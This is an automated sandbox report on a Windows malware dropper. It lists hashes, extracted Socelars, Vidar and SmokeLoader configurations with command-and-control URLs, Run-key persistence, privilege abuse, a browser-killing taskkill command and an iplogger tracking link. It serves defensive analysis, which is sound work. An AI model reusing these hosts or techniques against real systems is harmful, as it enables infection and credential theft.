Analysis
-
max time kernel
156s -
max time network
173s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
22-02-2022 07:59
Static task
static1
Behavioral task
behavioral1
Sample
2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
Resource
win7-en-20211208
General
-
Target
2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe
-
Size
3.6MB
-
MD5
dd50ef8e8e983f27154ab17911100b42
-
SHA1
cdb02b08be4c5f882e68bff48badf50d62ef8f66
-
SHA256
2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df
-
SHA512
ad061f2f4fcd1fec086b04ee6aff7d7861c6102b086952d74f6077ee9ea43b889faa52e82edc28047cf79f80eab9d272daa537e927fe3c6182a69cdfc63bcc34
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
vidar
38.7
890
https://HAL9THapi.faceit.comramilgame
-
profile_id
890
Extracted
smokeloader
2020
http://khaleelahmed.com/upload/
http://twvickiassociation.com/upload/
http://www20833.com/upload/
http://cocinasintonterias.com/upload/
http://masaofukunaga.com/upload/
http://gnckids.com/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\agdsk.exe family_socelars C:\Users\Admin\AppData\Local\Temp\agdsk.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5104 created 4708 5104 WerFault.exe rundll32.exe PID 2128 created 4752 2128 WerFault.exe File.exe -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4752-168-0x00000000024D0000-0x0000000002567000-memory.dmp family_vidar behavioral2/memory/4752-169-0x0000000000400000-0x000000000049A000-memory.dmp family_vidar -
Executes dropped EXE 10 IoCs
Processes:
agdsk.exejg2_2qua.exeKRSetp.exewf-game.exeFiles.exepzyh.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exepid process 1164 agdsk.exe 2072 jg2_2qua.exe 4192 KRSetp.exe 2752 wf-game.exe 2464 Files.exe 3680 pzyh.exe 3648 pub2.exe 4752 File.exe 3520 jfiag3g_gg.exe 4468 jfiag3g_gg.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exewf-game.exeFiles.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wf-game.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exepub2.exepid process 4708 rundll32.exe 3648 pub2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
pzyh.exemsedge.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Processes:
jg2_2qua.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg2_2qua.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 41 ip-api.com -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\eb3deb83-e0d5-46a9-9c50-72a67882adb6.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129011108.pma setup.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 5048 4708 WerFault.exe rundll32.exe 1852 4752 WerFault.exe File.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
WerFault.exeWerFault.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 5348 taskkill.exe -
Modifies registry class 4 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pub2.exeWerFault.exejfiag3g_gg.exeWerFault.exemsedge.exemsedge.exepid process 3648 pub2.exe 3648 pub2.exe 5048 WerFault.exe 5048 WerFault.exe 4468 jfiag3g_gg.exe 4468 jfiag3g_gg.exe 1852 WerFault.exe 1852 WerFault.exe 920 msedge.exe 920 msedge.exe 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 1864 msedge.exe 1864 msedge.exe 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 2920 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 3648 pub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe 1864 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
agdsk.exeKRSetp.exeWerFault.exesvchost.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 1164 agdsk.exe Token: SeAssignPrimaryTokenPrivilege 1164 agdsk.exe Token: SeLockMemoryPrivilege 1164 agdsk.exe Token: SeIncreaseQuotaPrivilege 1164 agdsk.exe Token: SeMachineAccountPrivilege 1164 agdsk.exe Token: SeTcbPrivilege 1164 agdsk.exe Token: SeSecurityPrivilege 1164 agdsk.exe Token: SeTakeOwnershipPrivilege 1164 agdsk.exe Token: SeLoadDriverPrivilege 1164 agdsk.exe Token: SeSystemProfilePrivilege 1164 agdsk.exe Token: SeSystemtimePrivilege 1164 agdsk.exe Token: SeProfSingleProcessPrivilege 1164 agdsk.exe Token: SeIncBasePriorityPrivilege 1164 agdsk.exe Token: SeCreatePagefilePrivilege 1164 agdsk.exe Token: SeCreatePermanentPrivilege 1164 agdsk.exe Token: SeBackupPrivilege 1164 agdsk.exe Token: SeRestorePrivilege 1164 agdsk.exe Token: SeShutdownPrivilege 1164 agdsk.exe Token: SeDebugPrivilege 1164 agdsk.exe Token: SeAuditPrivilege 1164 agdsk.exe Token: SeSystemEnvironmentPrivilege 1164 agdsk.exe Token: SeChangeNotifyPrivilege 1164 agdsk.exe Token: SeRemoteShutdownPrivilege 1164 agdsk.exe Token: SeUndockPrivilege 1164 agdsk.exe Token: SeSyncAgentPrivilege 1164 agdsk.exe Token: SeEnableDelegationPrivilege 1164 agdsk.exe Token: SeManageVolumePrivilege 1164 agdsk.exe Token: SeImpersonatePrivilege 1164 agdsk.exe Token: SeCreateGlobalPrivilege 1164 agdsk.exe Token: 31 1164 agdsk.exe Token: 32 1164 agdsk.exe Token: 33 1164 agdsk.exe Token: 34 1164 agdsk.exe Token: 35 1164 agdsk.exe Token: SeDebugPrivilege 4192 KRSetp.exe Token: SeRestorePrivilege 5048 WerFault.exe Token: SeBackupPrivilege 5048 WerFault.exe Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 4204 svchost.exe Token: SeCreatePagefilePrivilege 4204 svchost.exe Token: SeShutdownPrivilege 4204 svchost.exe Token: SeCreatePagefilePrivilege 4204 svchost.exe Token: SeShutdownPrivilege 4204 svchost.exe Token: SeCreatePagefilePrivilege 4204 svchost.exe Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 Token: SeDebugPrivilege 5348 taskkill.exe Token: SeShutdownPrivilege 2920 Token: SeCreatePagefilePrivilege 2920 -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
msedge.exepid process 1864 msedge.exe 2920 1864 msedge.exe 2920 2920 2920 2920 -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
wf-game.exepid process 2752 wf-game.exe 2752 wf-game.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2920 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exemsedge.exewf-game.exeFiles.exepzyh.exeWerFault.exedescription pid process target process PID 3840 wrote to memory of 1164 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe agdsk.exe PID 3840 wrote to memory of 1164 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe agdsk.exe PID 3840 wrote to memory of 1164 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe agdsk.exe PID 3840 wrote to memory of 2072 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe jg2_2qua.exe PID 3840 wrote to memory of 2072 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe jg2_2qua.exe PID 3840 wrote to memory of 2072 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe jg2_2qua.exe PID 3840 wrote to memory of 4192 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe KRSetp.exe PID 3840 wrote to memory of 4192 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe KRSetp.exe PID 3840 wrote to memory of 1864 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe msedge.exe PID 3840 wrote to memory of 1864 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe msedge.exe PID 3840 wrote to memory of 2752 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe wf-game.exe PID 3840 wrote to memory of 2752 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe wf-game.exe PID 3840 wrote to memory of 2752 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe wf-game.exe PID 1864 wrote to memory of 2264 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 2264 1864 msedge.exe msedge.exe PID 3840 wrote to memory of 2464 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe Files.exe PID 3840 wrote to memory of 2464 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe Files.exe PID 3840 wrote to memory of 2464 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe Files.exe PID 3840 wrote to memory of 3680 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pzyh.exe PID 3840 wrote to memory of 3680 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pzyh.exe PID 3840 wrote to memory of 3680 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pzyh.exe PID 3840 wrote to memory of 3648 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pub2.exe PID 3840 wrote to memory of 3648 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pub2.exe PID 3840 wrote to memory of 3648 3840 2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe pub2.exe PID 2752 wrote to memory of 4708 2752 wf-game.exe rundll32.exe PID 2752 wrote to memory of 4708 2752 wf-game.exe rundll32.exe PID 2752 wrote to memory of 4708 2752 wf-game.exe rundll32.exe PID 2464 wrote to memory of 4752 2464 Files.exe File.exe PID 2464 wrote to memory of 4752 2464 Files.exe File.exe PID 2464 wrote to memory of 4752 2464 Files.exe File.exe PID 3680 wrote to memory of 3520 3680 pzyh.exe jfiag3g_gg.exe PID 3680 wrote to memory of 3520 3680 pzyh.exe jfiag3g_gg.exe PID 3680 wrote to memory of 3520 3680 pzyh.exe jfiag3g_gg.exe PID 5104 wrote to memory of 4708 5104 WerFault.exe rundll32.exe PID 5104 wrote to memory of 4708 5104 WerFault.exe rundll32.exe PID 3680 wrote to memory of 4468 3680 pzyh.exe jfiag3g_gg.exe PID 3680 wrote to memory of 4468 3680 pzyh.exe jfiag3g_gg.exe PID 3680 wrote to memory of 4468 3680 pzyh.exe jfiag3g_gg.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe PID 1864 wrote to memory of 540 1864 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe"C:\Users\Admin\AppData\Local\Temp\2d196d74d5159206dc79a0d9f87d14a0400ce3b3bb43ff19989e0c852fe839df.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\agdsk.exe"C:\Users\Admin\AppData\Local\Temp\agdsk.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffea46446f8,0x7ffea4644708,0x7ffea46447183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3264 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5528 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x208,0x22c,0x7ff683555460,0x7ff683555470,0x7ff6835554804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2412 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,13322267187945163271,16133231272615554994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:83⤵
-
C:\Users\Admin\AppData\Local\Temp\wf-game.exe"C:\Users\Admin\AppData\Local\Temp\wf-game.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install3⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 6004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
